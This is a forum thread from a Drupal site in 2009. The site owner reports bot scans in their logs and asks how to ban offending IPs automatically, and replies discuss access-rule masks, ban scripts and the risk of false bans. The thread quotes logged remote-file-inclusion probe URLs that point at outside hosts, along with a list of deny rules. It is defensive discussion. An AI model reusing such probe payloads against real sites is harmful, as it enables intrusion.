How to automatically ban IP if...
hedac - February 15, 2009 - 11:15
I have a lot of requests from different IP from China with requests of random files of rar extension.
in the log I see page not found errors of mirserver.rar, www.rar, backup.rar,... and so on... I don't have rars in my site. but I would like to ban automatically those ips trying to get rars from my site which are consuming my resources.. Is there a sway to do this? Thanks
new entry page not found:
new entry page not found: admin/Databackup/NewCloud_Backup.MDB
what is that? lol
it is clear I have tons of spy bots
bots are using many many
bots are using many many different IP from Korea. China... USA... ..... and they try to exploit some things..... drupal is secure and doesn't give them anything but a page not found... but... I hate having them around... they eat bandwidth and memory....
new entries:
playlist.php/db.php?commonpath=http://6l0zt.com/technote7/data/group/id.txt??
common/db.php?commonpath=http://www.sec-ir.com/administrator/components/com_joomla-visites/core/modules/remember.txt????
new requests... searching for
new requests... searching for vulnerabilities I guess...
/content/errors.php?error=http://mixcom.ru/pic/main.jpg???
/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/bocah_ajaib20/id.txt%0D??
they are all different ip
not only one bot... hundreds of them... or one bot using a lot of proxies
how could we ban ip for some
how could we ban ip for some days automatically if it requests a page like errors.php... ?
keep having attacks..... this
keep having attacks.....
this is my current list of banned hosts
deny host 210.183.36.% edit delete
deny host 65.254.41.% edit delete
deny host 220.135.110.% edit delete
deny host 66.36.164.% edit delete
deny host 124.139.67.% edit delete
deny host 202.71.213.% edit delete
deny host 212.113.48.% edit delete
deny host 93.157.3.% edit delete
deny host 194.144.60.% edit delete
deny host 58.227.193.% edit delete
deny host 67.15.48.% edit delete
deny host 92.115.212.% edit delete
deny host 63.247.141.% edit delete
deny host 81.176.78.% edit delete
deny host 78.40.226.% edit delete
deny host 212.95.58.% edit delete
deny host 201.212.1.% edit delete
deny host 65.98.123.% edit delete
deny host 74.6.18.242 edit delete
deny host 72.30.79.32 edit delete
deny host 58.226.94.% edit delete
deny host 84.21.71.% edit delete
deny host 218.234.18.% edit delete
this one is very rare from
this one is very rare
from Hostname 208.99.199.20
misc/);G(7.V.18==
misc/)))1e(-d.2e,-d.2c);G(42
misc/,M),D.2a(a,
misc/,c);G(40)d.9Q(f,
and more like that...
of course... another ip to the block Deny list.
question and info
Is there a character that would ban a range of ip addresses in the mask box[access rules] or somewhere else?
would like to ban/deny the following range: 208.99.192.0 - 208.99.223.255
fwiwd; for what its worth dept;
http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults
http://news.cnet.com/Alleged-Seattle-Spammer-arrested/2100-7348_3-618775...
I don't think so. % is all.
I don't think so. % is all. but not between 192 and 223.
Banning IP range
I get this same spammer hammering away at my site...
You can block IP range: 208.99.192.0 - 208.99.223.255 in Home › Administer › User management › Access rules with:
Deny:
208.99.19_.%
208.99.220.%
208.99.221.%
208.99.222.%
208.99.223.%
Allow:
208.99.190.%
208.99.191.%
I would like to ask if is
I would like to ask if is there a way to automatically BAN or add the IP to the Deny hosts list if they try to reach a specific page for example "content/common/db.php"
This one is tricky. On what
This one is tricky. On what to consider "banneable" and if it is realy worth it, in terms of processing time needed to identify these attacks and in terms of possible "false bans" (a www site is supposed to be a pulic place).
I can't mention a Drupal project for this.
At the webserver level, protecting against IPs used to "scan" a site sounds good. I can think on looking for IPs being present many times in /var/logs. There is a risk of banning a legitimate spider, such as Google.
Similarly, you could look for a certain "phrase" in that file, no matter if it's repeated or not. This is what you asked for (the phrase would be the path you would want).
For starters, take a look at Banning Bad Bots: A Short But Effective Script (not a Drupal specific solution).
Hope that helps. Saludos!
then there's always...
http://drupal.org/project/badbehavior - not quite what the OP is asking about, but should help a bit.
~silverwing
_____________________________________________
MisguidedThoughts
thanks. very interesting...
thanks. very interesting... maybe is what I'm looking for.
Gracias :) I have searched
Gracias :)
I have searched info for the IP's and none of them are google or any good bot. All of them are in some unknown host providers or without info. And also. google bot should not request pages with all those suspicious parameters.
I think that rewrite solution is very good
De nada
Just a further comment: When I said "There is a risk of banning a legitimate spider, such as Google.", I should have said "there is a risk of banning a legitimate IP, such as Google's or any other IP."
With public non-fixed IPs being used by these suckers, and if you use an automatic solution, you might be banning ANYONE on the Internet from seeying your site.
The impact of this can be negligible (20-100 users out of millions?), but that IP can be used by anyone on the net. It's just a balance between living with those extra request handled by the server (and keeping everything patched, which is a must) or loosing (even though it's just a bit) of your visibility. You and I can afford losing those potential readers. The New York Times or a high-trafic site might not.
A different but related issue would be a DoS attack. Those are punctual in time, but another PITA!